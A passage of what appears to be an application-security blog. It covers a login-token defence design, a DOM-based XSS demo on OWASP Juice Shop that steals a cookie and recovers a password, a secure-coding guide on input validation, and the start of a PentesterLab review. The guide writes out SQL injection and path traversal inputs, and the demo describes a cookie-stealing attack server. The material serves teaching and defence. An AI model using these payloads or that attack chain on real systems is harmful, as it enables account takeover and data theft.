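        limit = MAX_FAILURES_WITH_TOKEN if has_valid_ot2fa_token else MAX_FAILURES_WITHOUT_TOKEN
        return recent_failures < limit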

Another idea is allowing more than one user to log in from a single user agent, for shared devices/computers. However, there is a risk of over-engineering the implementation for limited benefit.

One can also consider a number of options for rolling this out smoothly, so that it is as transparent as possible when the technology is first adopted by a company for their existing user base. There are many approaches for that, which would be too much of a tangent to expound upon here.

Aside: Clarification on Tokens

OT2FA tokens should not be confused with session ids or session tokens.

Session ids/tokens are high value and relatively short lived.  If an attacker captures a session token, he then can hijack the victim’s account.

OT2FA tokens are long-lived tokens and are insufficient for hijacking an account.  OT2FA tokens serve one purpose: to limit the ability of a hacker to perform password guessing attacks on user accounts.

Potential Concerns

The implementation may leak the validity of the password: The most straightforward way of implementing this is to only challenge for the second factor after the username and password are confirmed. Note that if it is not implemented this way, then the user would (under some implementation assumptions) get notified every time somebody malicious tries an incorrect password for that user, which would be annoying and a cause of unnecessary stress to the user.

The fact that the validity of the password is leaked is not necessarily a bad thing. In fact, depending upon the wording of the email/SMS with the second factor code, it may be a good thing, because it alerts the user that there is good reason to change their password. For example, a notice like:

“A new device has attempted to log in to your account! If this is you, please click this link to prove your identity.
If this was not you, then it means that somebody has your password. Don’t panic: we have protected access to your account. However, we recommend that you change your password to prevent this person from continuing to attempt to access your account.”

Remark: The academic research papers mentioned above are more sophisticated than OT2FA, and attempt to hide the validity of the password (See Section 4 of Pinkas and Sander paper). But they do so using captchas, which we consider a no-no for usability and accessibility reasons. Not to mention that machines seem to be better than humans at captchas nowadays, which defeats the whole point of the technology.

Brute forcing the second factor: When a hacker gets the username and password correct, he can then focus his attention on brute forcing the second factor. This is only practical for the attacker if the second factor is brute force-able (for example, a 6-letter code), in which case it needs to be prevented in some way. For example, after too many wrong second factor guesses, impose a temporary account lockout for devices that do not have a valid OT2FA token for that user. The length of the lockout should depend upon the time it takes to brute force the second factor challenge, and the user should be notified of the lockout via email or SMS.

Private browsing: For those who use private/incognito browsing, they may be forced to do 2FA every time because the OT2FA token does not persist on the client device. Allowing security and privacy conscious individuals to opt-out is one compensating control to address this.

Public/shared computers: You would not want to store the OT2FA token on a shared computer, because this would allow a hacker to capture it and then brute force the password without the second factor challenge. The first defence is to allow the user to click “shared computer” upon login, which will prevent the token from being stored on it. Having a revocation mechanism (see enhancements section) is a second defence.

Stolen OT2FA token: One way to reduce the risk of cookie theft is to make cookies httpOnly. But this alone cannot be relied upon, since there are a number of ways cookies may leak – not to mention that you might not even be using cookies for storing the token.

If the OT2FA token is stolen, it reduces to the security of password-only for that user – assuming the attacker knows to whom the token belongs. Having a revocation mechanism (as described above) is a compensating control.

Mass OT2FA token leakage: If there is mass token theft, then the security reduces to password-only under the assumption that the attacker can somehow map each token to each username. Usernames should not be put in tokens; instead, unique identifiers should be stored there and mapped to the user via the database. If the attacker is able to brute force a large number of accounts this way, it implies that the attacker not only has the tokens but also the mapping between tokens and users. This is a bad situation, and it requires a serious response from the owners of the website. The recommended action is to roll the key that is used for signing the OT2FA tokens, which means each user has to perform the OT2FA on each of their user agents again.

User loses access to email: If the user loses access to the email address that the second factor authentication requests are sent to, then he cannot add a new user agent as trusted. However, if the user has at least one already trusted user agent, he can use that one to update his email address on the system, thus working around the problem. When a user's email address is changed, an email should be sent to the previous address to make sure this did not happen maliciously. There are other controls that can be added to reduce the risk of a hacker who succeeds in defeating the OT2FA locking a user out of his account.

Questions

Is this the same as OWASP page on device cookies? No. It is similar, but the OWASP description gives out device cookies upon valid username/password without requiring the second factor authentication. As mentioned on the OWASP page, it does not stop password spraying attacks like OT2FA does. It also cites the source as Marc Heuse and Alec Muffett, whose discussions on the topic came years after the research cited at the top of this blog.

Is it just risk based authentication? Risk based authentication was first described in Enhanced Authentication In Online Banking by Gregory D. Williamson in 2006, which we cited at the beginning. The document recommends a number of ideas for enhancing security, such as:

“Machine Authentication, or PC fingerprinting, is a developing and widely used form of authentication (FFIEC, 2005). This type of authentication uses the customer’s computer as a second form of authentication (PassMark Security, n.d.). Machine authentication is the process of gathering information about the customer’s computer, such as serial numbers, MAC addresses of parts in the computer, system configuration information, and other identifying information that is unique to each machine. A profile is then built for the user and the machine. The profile is captured and stored on the machine for future use by the authentication system (PassMark Security, n.d.). Once the PC fingerprint is gathered, the system knows what machine attributes should be present when the user attempts to access their online bank account (Entrust, 2005). This type of authentication usually requires the user to register the machine at first sign on. If a customer logs in from another computer the system will know to further scrutinize the login attempt. At this point the system can prompt for additional authentication, such as out of band authentication or shared secret questions.”

The concepts here are very similar to the description of OT2FA except they use device fingerprinting instead of digital signatures to identify devices. Indeed, if one Googles for risk based authentication, many websites (example) talk about device fingerprints without mentioning the concept of digital signatures.

Device fingerprints are less preferable than digital signatures. Through reverse engineering, one is able to determine what device properties are used for the fingerprint. Depending upon exact details, this could potentially be used by a hacker to brute force the fingerprint of a victim once he knows the password. In contrast, brute forcing a cryptographic digital signature is not practical assuming that the crypto is done correctly.

In general, OT2FA is a special case of risk based authentication. It is a particularly simple and strong way of implementing the concept.

Conclusion

When security does not have an adequate answer, we often transfer the burden to the user. Putting too much burden on the user is bad security practice, as it violates the important security principle of psychological acceptability.

In regard to login security, complex passwords, password rotation, captchas, 2FA, etc… are all poor solutions for a general audience due to the burden they put on users. Users resoundingly reject these ideas and technologies for day-to-day online activities, so something better is needed.

OT2FA is a practical tradeoff between security and usability. It offers much stronger security than username/password-only, with very little usability impact. It can also fairly easily be implemented by any organisation. Most importantly, it is a realistic, practical solution for stopping large scale password guessing attacks without significantly burdening users.

Footnotes

Footnote 1: If one takes the approach of putting a unique identifier in the OT2FA token for revocation purposes, the use of server side persistent storage can change the whole implementation: rather than using digital signatures on the tokens, instead store a copy of each non-revoked token for each user in server side persistent storage.  When a user logs in with an OT2FA token, a simple verification that the token is in the server side database for that user takes the place of any digital signature check.  The major downside of this approach is that it requires more storage: one token for each device for each user, and any user could potentially generate a large number of them for himself using automated means.  If this is considered a threat, then obvious mitigating controls can be put in place.
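
A minimal sketch of this alternative, with random tokens stored server side and no signatures at all (again illustrative only; the dictionary stands in for a database table):

    import secrets

    TRUSTED_TOKENS = {}  # username -> set of active device tokens

    def issue_stored_token(username):
        token = secrets.token_urlsafe(32)
        TRUSTED_TOKENS.setdefault(username, set()).add(token)
        return token

    def verify_stored_token(username, token):
        return token in TRUSTED_TOKENS.get(username, set())

    def revoke_stored_token(username, token):
        TRUSTED_TOKENS.get(username, set()).discard(token)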

Acknowledgments

The author would like to thank Dharshin De Silva for feedback on a preliminary version of this document.

Demonstrating Reflected versus DOM Based XSS

Update April 2021: Some changes to the Heroku Juice Shop app have broken this demo.  The script payload no longer works for Juice Shop; however, there are other XSS payloads that do work, such as payloads that use the onerror attribute of the img tag.  I am not going to update the screenshots below, but I have updated the malicious server code so that one can still see the proof of concept.

Original Blog

In my employment, I am responsible for making sure developers produce secure code, and security education is a key part of reaching this goal.  There are many ways that one can approach security education, but one thing that I have found is that developers really appreciate seeing how attacks are performed and exploited in practice, so hacking demonstrations and workshops have so far been a hit.

In doing these demonstrations, I have found two intentionally insecure test sites that have very similar cross site scripting (XSS) vulnerabilities – Altoro Mutual and OWASP Juice Shop. In fact, on the surface the vulnerabilities look identical, but under the hood they are different: Altoro Mutual has a reflected XSS whereas the Juice Shop has DOM-based XSS. It turns out that DOM-based XSS is much more convenient to demonstrate in a corporate environment for a few reasons, and in general more favourable to an attacker.

In this blog, I explain why and show you how to build a really cool demo of exploiting the OWASP Juice Shop DOM-based XSS. You will need a malicious server for the demo, but I have the code and a sample server all ready for your convenience. The demo uses the malicious server to steal the victim’s cookie, and from there we are able to retrieve his password. Full details below.

Background

If you are not familiar with XSS, this section is for you. Everyone else, skip to the good stuff below.

XSS is when an attacker can have his own JavaScript executing from somebody else's website, and in particular in one or more victim users' browsers.

The most famous XSS attack that I know of is the "Samy is my Hero" MySpace worm.  Although it was not as malicious as it could have been, Samy Kamkar created a script on MySpace that would send Samy a friend request and copy the script onto the victim's MySpace profile, along with displaying the string "but most of all, samy is my hero" on their profile. Within 20 hours, Samy had over one million friend requests.

The Samy worm was a persistent XSS, which means the script was permanently stored in the database. Persistent XSS vulnerabilities are the worst kind because everyone becomes vulnerable just by visiting the site.

Two other XSS types are reflected and DOM-based, which you will learn about in good detail by reading this blog. These are both less severe than persistent because the victim needs to be tricked into hitting the vulnerability (i.e. social engineering), but we will see that the consequences can be pretty bad for those who fall victim.  I have not seen any comparison of the severity of the two, but below I make the argument that DOM-based is more serious than reflected.

The Two Vulnerabilities

Let's start with Altoro Mutual. In the search bar, you can type a script, for example a simple alert("hello") surrounded by <script> open and close tags. Upon hitting enter, you might see that the script executes (reflected XSS). However, you also might not see this. For example, if you try running it in a corporate environment, then the company proxy might have stopped it (one of the problems I ran into). If you use Chrome, you might have found that Chrome blocked it (one of the problems that the audience ran into when trying it). There are workarounds for both cases, but it blunts the point about the severity of the issue when it only works in special cases.

Now let's try the exact same thing in OWASP Juice Shop. Type your script in the search bar and hit enter; I'm quite sure you will see the alert pop up (DOM-based XSS). In my case, neither the corporate proxy nor Chrome blocked it. There is a good reason for that.

Looking Closer

Let's first confirm that the Altoro Mutual vulnerability is really reflected XSS and the OWASP Juice Shop one is really DOM-based. We do that by sending the communications through your favourite intercepting proxy. For Altoro Mutual, we see that the script entered in the search bar was reflected back as part of the html. Doing the same with the Juice Shop, the script was not reflected back.

You can look further. If you open up your browser developer tools, you will see that the search value gets put into the html via client-side JavaScript. Inside the default Juice Shop html there is an input form which contains:

ng-model="searchQuery"

The ng-model is AngularJS functionality. AngularJS by default escapes content to prevent XSS, unless you code your JavaScript in a really dumb way, which was intentionally done for the Juice Shop:

r.searchQuery = t.trustAsHtml(e.search().q)

trustAsHtml is an Angular method that bypasses the default escaping.

Corporate proxies and browsers (though Firefox currently does not do this) can easily block reflected XSS by checking whether the string sent contains a script and looking to see if the exact same string comes back. They can stop the hack as it is happening.

The same protection does not happen for DOM-based XSS. The attack happens entirely in the browser, which prevents corporate proxies from stopping it. It is a lot trickier for a browser to stop this type of attack than it is for one to stop reflected XSS.

Demonstrating Real Exploitation of DOM-based XSS

Although one can explain to developers and business people the dangers of XSS, nothing is more convincing than a real demonstration, and the OWASP Juice Shop is perfect for this. In our demonstration, we need a malicious server. I have created one for you that you can deploy in a couple of minutes on Heroku: see the GitHub link. To speed things up, you can use my temporary server (to be taken down later).

In our demo, assume a user has logged into the OWASP Juice Shop. The user visits a malicious website that has a link promising free juice if you click it. Clicking the link triggers an XSS that takes the victim’s cookie and sends it to a “/recorddata” endpoint on the malicious server. From there, the attacker can hit a “/dumpdata” endpoint to display the captured cookies. The cookies contain JWTs, which, when decoded, contain the MD5 hash of the user’s password (very dumb design, but I have seen worse in real code that was not intentionally insecure). Using Google dorking, the MD5 hash can be inverted to recover the victim’s password. Full details below.

First head over to the OWASP Juice Shop and click Login. From there, you can register. See the figure below:

01_login_juice

Next you create the account of your victim user:

02_create_account

Then the victim logs in:

03_victim_login

All is fine and dandy, until somebody tells the victim of a website that offers free juice to OWASP Juice Shop customers. What could be better! The victim rushes to the site (for our temporary deployment, the link is: https://frozen-crag-69213.herokuapp.com/freejuice):

04_freejuice

Upon clicking the link, the DOM-based XSS is triggered. A nontechnical user would likely not realise that a script from the malicious site has executed. In this case, the script has taken the victim’s cookie and sent it to the malicious website. The malicious website has a “/recorddata” endpoint that records the cookie in a temporary file (a more serious implementation would use a database).

05_link_clicked

Our malicious server also has a “/dumpdata” endpoint for displaying all the captured cookies (here for our temporary server).

06_retrieve_cookie

Inside the cookie is a JWT. Let’s copy that JWT to the clipboard:

07_copy_cookie

And now head over to jwt.io, where we can paste the token in and decode it:

08_jwt_decoded

Amazing! The username and password are in the cookie. But that’s not the real password, so what is it? Let’s Google it:

09_google_dorking

Clicking the first link, we find out that it was the MD5 hash of the password. The real password is revealed in the link:

10_get_password

Conclusion

I have found that rather than being taught boring coding guidelines, developers much prefer to see security vulnerabilities and how they are exploited in practice. Once they understand the problems, they find a way to code properly. Developers are, after all, very good at using Google to find answers once they understand the problem they are trying to solve.

The OWASP Juice Shop is a great website for demonstrating security vulnerabilities, but in some cases you need to add your own parts to make the demo complete. In this blog, we provided the malicious server that executes a DOM-based XSS when a user clicks a link, which allows the attacker to recover the user’s password. The Juice Shop DOM-based XSS is much more convenient to demonstrate exploitation than the reflected XSS in Altoro Mutual.

For those familiar with CVSS for rating security vulnerabilities, the rating includes an attack complexity parameter to indicate whether special conditions need to exist for the attack to be successful. For reflected XSS, two special conditions were mentioned above: the victim’s browser needs to not defend against the attack (most browsers will stop it) and the victim needs to be in an environment where the attack is not blocked. For DOM-based, it appears that there are no special conditions (browsers will not block DOM-based attacks, and the environment is irrelevant for this attack to work). Hence, DOM-based XSS is more favourable to attackers than reflected XSS, the difference being the complexity of pulling off the attack. Therefore, DOM-based XSS is more severe than reflected XSS, but less severe than persistent.

Secure Coding: Understanding Input Validation

Developers are often provided with a large amount of security advice, and it is not always clear what to do, how to do it, and how important it is. Especially considering that security advice has changed over time, it can be confusing. I was motivated to write this blog because the best guide I found on input validation is very dated, and I wanted to provide clear, modern guidance on the importance of the topic.  There is also the OWASP Input Validation Cheat Sheet as another source on this topic.

This blog is targeted to developers and Application Security leads who need to provide guidance to developers on best practices for secure coding.

Input validation is the first line of defence for secure coding. There are many ways that a hacker will go after your software, and it would be naive to assume that you know all of them. The point of input validation is that, when done correctly, it will stop a number of attacks that you will not foresee. When it doesn’t completely stop them, it usually makes them more restricted or more difficult to pull off. Remember: input validation is not about stopping specific attacks, but instead a general defence for stopping any number of attacks.

Input validation is not hard to do, but sometimes it takes time to figure out what character set the data should conform to. This blog will be primarily focused on web applications, but the same concepts apply in other scenarios.

Below is guidance on how to do it, when to do it, and examples of how input validation might save you if you got other parts of the coding wrong. It must be emphasised that input validation is not a panacea, but when done correctly, it sure makes your application a lot more likely to resist a number of attacks.

What is input validation?

Hackers attack websites by sending malicious inputs. This could be through a web form or AJAX request, by sending requests directly to your API with tools such as curl or Python, or by using an intercepting proxy (typically Burp, but other tools include ZAP and Charles), which sits somewhere in between the former two methods.

Input validation means to check on the server side that the input supplied by the user/attacker is of the form that you expect it to be. If it is not of the right form, then the data should be rejected, typically with a 400 http status code.

What is meant by right form? At the minimum, there should be a check on the length of the data, and the set of characters in the data. Sometimes, there are more specific restrictions on the data — consider some insightful examples below.

Example: phone number. A phone number is primarily digits, with a maximum of 15 digits. If you allow international numbers, then plus (‘+’) is a valid character. If the area code is in parentheses, then the parentheses are additionally valid characters. If you want to allow the user to enter dashes or spaces, then you can add those to the list of allowed characters as well, though you don’t need to (front end developers can make it so that the user does not need to send such data). In total we have at most 15 different valid characters and at most 15 digits — this is your validation rule. Additionally, you should always have a limit on the total length of the string supplied (including parentheses, spaces, dashes, pluses) to stop malicious users from fiddling.

Example: last name. This one is more complicated, but a Google search gives us a pretty good answer. Importantly, you need to allow hyphens (Hector Sausage-Hausen); spaces, commas, and full stops (Martin Luther King, Jr.); and single quotes (Mathias d’Arras). See also the comments that identify extra characters that should be included if one wants to truly try to accept all international names, but it depends upon your application. As for length limit, if you really want to allow the longest names in the world, you can, but I would personally think a limit like 40 characters is sufficient.

Example: email address. Email addresses are an example where the character set is well defined, but the format is restricted. There are published regular expressions all over the web that tell you how to validate email addresses, but this one looks quite useful because it tells you how to do it in many different languages.

Example: a quantity. A common requirement for ecommerce applications is to allow the customer to choose some number of items. Quantities should be positive integers, and there should be some reasonable upper limit to how many the person can choose. For example, you might allow only the quantities 0, 1, 2, …, 99 and anything else is rejected.

There are two types of input validation strategies: white list and black list. The examples above are white list — we have said exactly what is allowed and anything else is rejected. The alternative approach, black list, tells what is not allowed and accepts everything else. White list validation is a general defence that is not targeted towards a specific attack, and can often stop attacks that you may not foresee. On the other hand, black list validation rules out dangerous characters for a specific attack that you have in mind. Black list should never be relied upon by itself — we will talk more about that in the next section.
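To make this concrete, here is a minimal sketch of what white list validation could look like in Java. The regular expressions are hypothetical illustrations of the rules discussed above, not definitive rules for your application:

import java.util.regex.Pattern;

public class InputValidator {

    // Hypothetical white list rules based on the examples above
    private static final Pattern PHONE     = Pattern.compile("^[0-9+() \\-]{1,20}$");    // digits plus a few separators, capped length
    private static final Pattern LAST_NAME = Pattern.compile("^[\\p{L}' ,.\\-]{1,40}$"); // letters, hyphen, space, comma, full stop, apostrophe
    private static final Pattern QUANTITY  = Pattern.compile("^[0-9]{1,2}$");            // 0 to 99

    public static boolean isValidPhone(String s)    { return s != null && PHONE.matcher(s).matches(); }
    public static boolean isValidLastName(String s) { return s != null && LAST_NAME.matcher(s).matches(); }
    public static boolean isValidQuantity(String s) { return s != null && QUANTITY.matcher(s).matches(); }
}

Anything that does not match the pattern is rejected, which is exactly the white list philosophy: say what is allowed, and reject everything else.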

When and how to do it?

Validation must happen on the server side, and should be done before you do anything else with the data.

It’s not unusual to see client side validation (for usability), but if you do not also validate on the server side (for security), then it will stop your kid sister and nobody else. Remember, web hackers do not need to run the same JavaScript code that you serve to them. Most of the time, they are going to use an intercepting proxy to modify the request after it leaves the browser but before it reaches the server. For example, see this video.  [Footnote: there are some edge cases where client side input validation makes sense for security, such as DOM based XSS, but these are advanced topics that are beyond the scope of this blog.]

What should be validated? Any data that you use that an attacker can manipulate. For web applications, this includes query parameters, http body data, and http headers. For emphasis, you don’t need to validate every http header — instead, only validate the ones that your application uses somewhere in the code. I’ve seen a number of cases where applications use http headers such as User-Agent without realising that an attacker could put anything he wants for such values. For example, with curl one would just use the -H option.

Validation should be done immediately, before anything else (including logging) is done with the data. I’ve seen cases where developers tried to validate strings that were formed by concatenating fixed values with user input. Because the validation happened on the result of the string concatenation, the validation routine had to be liberal enough to allow every character in the fixed string. But one of the characters in the fixed string was key to allowing the attacker to supply his own malicious input. Since the validation had to allow it when coded this way, a hack was trivial to pull off.
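As a sketch of the difference in ordering (in Java; validateFullPath and validateDocName are hypothetical helpers, not taken from any real code base):

// Anti-pattern: validating after concatenation means the rule must accept
// every character in the fixed prefix, including the '/' an attacker needs
String badPath = "/user/files/" + request.getParameter("doc");
if (!validateFullPath(badPath)) { /* reject */ }   // '/' has to be allowed here

// Better: validate the raw user input against its own, much tighter rule first
String doc = request.getParameter("doc");
if (!validateDocName(doc)) {                       // e.g. only letters, digits, '.' and '_'
    // reject immediately with a 400 status code
}
String goodPath = "/user/files/" + doc;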

MVC frameworks such as .Net and Spring have good documentation on how to do input validation. For example, Microsoft has nice pages about input validation in various versions of ASP.NET MVC. Similarly, Spring has documentation and additional guidance can be found in various places.  In other cases, you might use a framework designed specifically for data validation, or write custom validation methods.
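For instance, with the Java Bean Validation annotations that Spring supports, a request model might look roughly like the sketch below. The class and field names are made up for illustration, and the exact annotation package depends on your framework version:

import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Pattern;
import javax.validation.constraints.Size;

public class OrderRequest {

    @NotNull
    @Size(max = 40)
    @Pattern(regexp = "^[\\p{L}' ,.\\-]+$")   // white list for a last name
    private String lastName;

    @NotNull
    @Min(0)
    @Max(99)                                  // reasonable upper limit on the quantity
    private Integer quantity;

    // getters and setters omitted
}

When the controller parameter is annotated with @Valid, requests that fail these rules are rejected, typically resulting in a 400 status code.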

Importantly, white list validation must always be done. Black list validation can supplement white list validation, but it cannot be relied upon by itself to stop an attack. The reason is that hackers are very good at finding ways around black list validation.

Yes, it is your responsibility

The diagram below depicts an example that I have seen a number of times, especially in microservices architectures.  System A receives data from the user, and passes it off to internal System B.  System B processes the data.  Where should input validation happen?

validate_internal_system

The developers of System A believe they are mainly acting as a proxy, and therefore the responsibility for input validation lies with System B.  On the other hand, the developers of System B believe they are getting data from an internal trusted source (System A), and therefore the responsibility for validating it lies with System A.  As a consequence, neither development team validates the data.  In the event that they get hacked, everyone has an excuse on why they didn’t do it.

The answer is that both are responsible for validating their input data.

System A needs to validate because otherwise it is vulnerable to various injection attacks when the data gets sent to System B, such as json injection or http header injection.  System B should validate its data because the muppets who wrote System A rarely do any meaningful validation on the data it passes along.  In summary, no matter where you are developing, you need to validate your input.  Don’t assume that somebody else is going to do it for you, because they won’t.

What about input sanitisation?

Sanitisation refers to changing user input so that it becomes not dangerous. The issue here is that what is dangerous depends upon the context in which it is used.

For example, suppose some user input is first logged and then later displayed to the user in his browser. In the context of logging, the dangerous characters are new lines (ASCII value 10) and carriage returns (ASCII value 13), because they allow an attacker to add a new line to your log file containing anything he wants, an attack known as log forging (discussed in more detail in the examples later). On the other hand, when the data is displayed to the user, the dangerous characters become those that can be interpreted by the browser to do something not intended by the web designer — the characters < > / and “ are the first that come to mind (normally we escape these characters).

It is not unusual for developers to get this wrong.  I have seen more than once the use of the OWASP Java HTML Sanitizer to attempt to sanitise data written to the log.  Wrong tool, wrong context.

Because sanitisation depends upon context, it is not desirable to try to sanitise inputs at the beginning in such a way that they will not be dangerous when later used. In other words, input sanitisation should never be used in place of input validation. Input validation should always be done.  Thus, even if you get the sanitisation wrong (e.g. see previous paragraph), input validation will often save you.

Note also that the concept of input sanitisation makes us think in a black list approach rather than a white list approach, i.e. we are thinking about what characters might be harmful in a specific context and what to do with them. This is another reason why input sanitisation should not displace input validation. Even very good developers have learned this the hard way.

The bottom line is that white list input validation is a general defence, whereas input sanitisation is a specific defence. General defences should happen when input comes in (at “source”), specific defences should happen when the data is later used (at “sink”). Never omit the general defence.

Examples

We have given the guidance, but now let’s justify it with examples. Let’s see how input validation can often save us when proper coding defences are lacking somewhere else in the code base. An important takeaway here is that even though input validation does not stop everything, it certainly does stop a lot, and makes other attacks a lot harder. Given how easy it is to perform the validation, the bang-for-your-buck analysis says to always do it.

Example: SQL injection

SQL injection vulnerabilities are most often due to forming SQL queries using string concatenation/substitution with user input. A typical example looks like this (Java):

String query = "SELECT * FROM User where userId='" + request.getParameter("userId") + "'";  // vulnerable

To get all users, the attacker can send the following for the userId parameter: xyz' or 1=1 --
That malicious input will change the query to:

SELECT * FROM User where userId='xyz' or 1=1 -- '

The attacker can do much more than this with more clever inputs, including fetching other columns or deleting the entire database. However, sticking to the simple example, notice the tools the attacker is using: the single quote to end the userId part of the query, the white spaces to add other statements, the equal to make a comparison that is always true, and the double dash to escape the remaining part of the query.

The proper defence against SQL injection, which should always be done, is either prepared statements or parameterised queries. However, let’s consider what would happen if the developer had validated the input but still formed the query with string concatenation.  In this case, the code might look like:

// This code is still wrong, but it is better than above
String userId = request.getParameter("userId");
if ( !validateUserId( userId ) )
{
    // Handle error condition, return status code of 400
    ...
}
String query = "SELECT * FROM User where userId='" + userId + "'"; // <--- Don't do this!

For data types like user ids, phone numbers, quantities, email addresses, and many others, input validation would not have allowed the single quote, which has already stopped the attack. However, for a field like a last name, a single quote must be allowed or else O’Malley will throw a fit.

Still, input validation would not have allowed the equal character in the last name and some other characters that attackers like to use. Additionally, limiting the number of characters that an attacker can provide (example: 40 for last name) would also impede the attacker. Truthfully, a good hacker would still succeed in getting an injection, but you might have stopped the script kiddie. The lesson here is: Just because you validated the data does not mean that you can be sloppy elsewhere.

A great website showing how to code SQL queries safely in various languages is Bobby Tables. They have a nice comic, but unfortunately the punch line is wrong:

xkcd

As the website correctly says on its about page: the answer is not to “sanitize your database inputs” yourself. It is prone to error. Instead, use prepared statements or parameterised queries.
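For reference, here is a minimal sketch of a parameterised query in Java with JDBC. It assumes the usual java.sql imports and an existing Connection object named conn:

// The userId value is bound as a parameter, never concatenated into the SQL string
String query = "SELECT * FROM User WHERE userId = ?";
try (PreparedStatement stmt = conn.prepareStatement(query)) {
    stmt.setString(1, request.getParameter("userId"));
    try (ResultSet rs = stmt.executeQuery()) {
        // process the results
    }
}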

Example: Log forging

A well written application should have logging throughout the code base. But logging user input can lead to problems. For example (C#):

log.Info("Value requested is " + Request["value"]); // vulnerable

Log files are separated by newlines or carriage returns, so if the value from the user contains a newline or a carriage return, then the user is able to put anything he wants into your log file, and it will be very hard for you to distinguish between what is real versus what was written by the attacker. If you did proper validation of your input, there are not many cases where one would allow newlines and/or carriage returns, so the validation would usually save you.

For a good technique to prevent log forging, see this nice blog by John Melton (the same concept works regardless of language).
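As a minimal illustration of the idea (not necessarily the exact technique from that blog, and sketched in Java even though the vulnerable example above is C#), one can neutralise carriage returns and newlines before logging:

String value = request.getParameter("value");
// Replace CR and LF so an attacker cannot forge extra lines in the log file
String safeValue = (value == null) ? "" : value.replaceAll("[\\r\\n]", "_");
log.info("Value requested is " + safeValue);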

Example: Path manipulation

Many web applications these days allow the user to upload to or read something from the server file system. It is not unusual for the file name to be formed by concatenating a fixed path with a file name provided by the user (C#):

String fn = Request["filename"]; // fn could have dangerous input
String filepath = USER_STORAGE_PATH + fn;
String[] lines = System.IO.File.ReadAllLines(filepath); // vulnerable

The above example does not validate the user provided filename, but normally a filename would only allow alphanumeric characters along with the ‘.’ for file extensions.

The risk here is that a user provides a file name of something like: ../../../system_secrets.txt (fictional file name). This allows the attacker to read the system_secrets.txt file, which is outside the USER_STORAGE_PATH path. Note that the input validation would not have prohibited the use of ‘.’, but it would have prevented the attacker from using the forward or backward slash, which is key to his success.

More generally, I don’t recommend letting users provide file names directly, and storage should be on a separate system. But even if you go against that advice, proper input validation will save you from path manipulation.
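A minimal sketch of such a white list check (in Java for consistency with the other sketches, even though the example above is C#):

import java.util.regex.Pattern;

// White list: alphanumeric characters plus a single '.' for the extension -- no slashes, so no traversal
static final Pattern FILENAME = Pattern.compile("^[A-Za-z0-9]+\\.[A-Za-z0-9]+$");

static boolean isValidFilename(String fn) {
    return fn != null && fn.length() <= 100 && FILENAME.matcher(fn).matches();
}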

Example: Server side request forgery

This is a nice example because not many people know what it is, but it has recently become quite a nice tool that hackers have added to their toolbox.

Consider that your web application might initiate an http request, where the destination of that request is somehow formed from user input. One might think that making the http request from the server is benign, because it is no different from the user making a similar request from his browser. But that reasoning is wrong, because the request from your server has access to your internal network, whereas the user himself should not.

An example is insightful. The website InterviewCake teaches developers how to solve difficult job interview questions. From the website, you can actually write code in a number of different languages and run it; the code runs in an AWS environment. It was then too easy for Christophe Tafani-Dereeper to write some simple Python code on InterviewCake that reveals AWS security credentials from the private network that the application was hosted on:

aws_exploit

This type of attack is common in AWS environments: learn about AWS Instance Metadata from Amazon.

Of course, allowing users to run arbitrary code in an environment that you host is extremely dangerous and is hard to defend against. More often we see cases like the following from StackOverflow (PHP):

php_ssrf

In the above example, the server will get the url of a file from a query parameter.  It assumes that the file type is either gif, png, or jpg, and then it serves that content to the client.  The only validation check is that the protocol is http (or https).

Although it appears to restrict to gif, png, or jpg files, the default case just reads the content regardless of type. An attacker could thus request anything he wants, and the request is made with the server’s privileges and network access.

To fix it, the server needs to validate that the incoming url is allowed to be accessed by the user. This can be done by verifying that the url matches a white list of allowed URLs. In this case, white list validation defeats the attack completely (when implemented properly), and no other defence is needed.
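A minimal sketch of such a white list check in Java (the allowed URLs here are hypothetical):

import java.util.Set;

// Hypothetical white list of URLs the server may fetch on a user's behalf
static final Set<String> ALLOWED_URLS = Set.of(
        "https://images.example.com/logo.gif",
        "https://images.example.com/banner.png");

static boolean isAllowedUrl(String url) {
    // Exact match against the white list; anything not explicitly listed is rejected
    return url != null && ALLOWED_URLS.contains(url);
}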

Example: Cross site scripting

Cross site scripting (XSS) is an old vulnerability that is still a major problem today. There are three types of XSS, but we’re not going to go into that level of detail here. XSS happens when untrusted input (typically user input) is interpreted in a malicious way in another user’s browser. Let’s look at a simple example (Java JSP):

<% String name = request.getParameter("name"); %>
Name provided: <%= name %>

If the input provided contains the query parameter

malicious_javascript

then that JavaScript will execute in a user’s browser. This type of XSS (reflected XSS) is typically exploited by user A emailing a link to user B with the malicious JavaScript embedded in it.

The proper defence for XSS is to escape the untrusted input. In JSP, this can be done with the JSTL <c:out> tag or fn:escapeXml(). But this needs to happen everywhere untrusted data is displayed, and missing one place can result in a critical security vulnerability.
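For example, the vulnerable JSP above could be rewritten roughly as follows (a sketch; it assumes the JSTL core taglib is available to the page):

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
Name provided: <c:out value="${param.name}"/>

The <c:out> tag escapes characters such as < > & and quotes by default, so a script supplied in the name parameter is rendered as text instead of being executed.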

Similar to other examples, input validation will often save you in the event that you missed a single place where the output needs to be escaped. As noted above, the characters < > / and ” are particularly dangerous in the context of html. These characters are rarely part of a white list of allowed user input.

Despite the dire warnings above, it is great to know that there are frameworks like Angular that escape all inputs by default, thus making XSS extremely unlikely to happen in that framework. Secure by default — what a novel concept.

Conclusion

White list input validation should always be done because it prevents a number of attacks that you may not foresee. This technique should happen as soon as data comes in, and invalid input should be rejected without further consideration. Input validation is not a panacea, so it should be coupled with specific defences that are relevant to the context in which the data is used. Input validation should be applied at the source, whereas the other specific defences are applied at the data sinks.

A Review of PentesterLab

stickers

After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would pass on the word about what a great learning resource it is. If I had to summarise it in one sentence, I would say it is an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, and there is no minimum number of months or annoying auto-renewal in the signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However, with the pro membership you get more content and you avoid the overhead of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice to PentesterLab is to talk about some of the exercises on the site, so at the end of the blog I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

